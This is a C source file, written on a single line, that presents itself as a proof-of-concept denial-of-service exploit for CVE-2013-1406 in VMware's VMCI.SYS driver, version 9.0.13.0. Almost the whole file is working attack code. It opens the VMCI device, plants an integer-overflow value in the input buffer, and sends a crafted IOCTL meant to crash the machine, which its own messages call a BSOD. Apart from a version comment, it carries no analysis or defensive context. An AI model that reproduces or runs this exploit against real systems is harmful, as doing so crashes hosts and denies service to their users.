/* This PoC only for version VMCI.SYS 9.0.13.0 */ #include "stdafx.h" #include "windows.h" #define count_massive 0x189 #define ioctl_vmsock 0x8103208C #define integer_overflow_size 0x12492492; int _tmain(int argc, _TCHAR* argv[]) { HANDLE vmci_device; DWORD bytesRet; int inbuf [count_massive]; int outbuf[count_massive]; int size_=count_massive*sizeof(int); printf("**************************************************\r\n"); printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n"); printf("**************************************************\r\n"); //opening vmci interface device vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL); if (vmci_device!=INVALID_HANDLE_VALUE) { printf("[+]vmci device opened \r\n"); //prepare input buffer memset(&inbuf,0,size_); //vulnerable to integer overflowing parameter inbuf[4]=integer_overflow_size; printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n"); //Delaying signed with Diablo stamp :D Sleep(0x29a); Sleep(0x1000); DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL); CloseHandle(vmci_device); } else { printf("[-]Error: Can't open vmci device!\r\n"); } return 0; }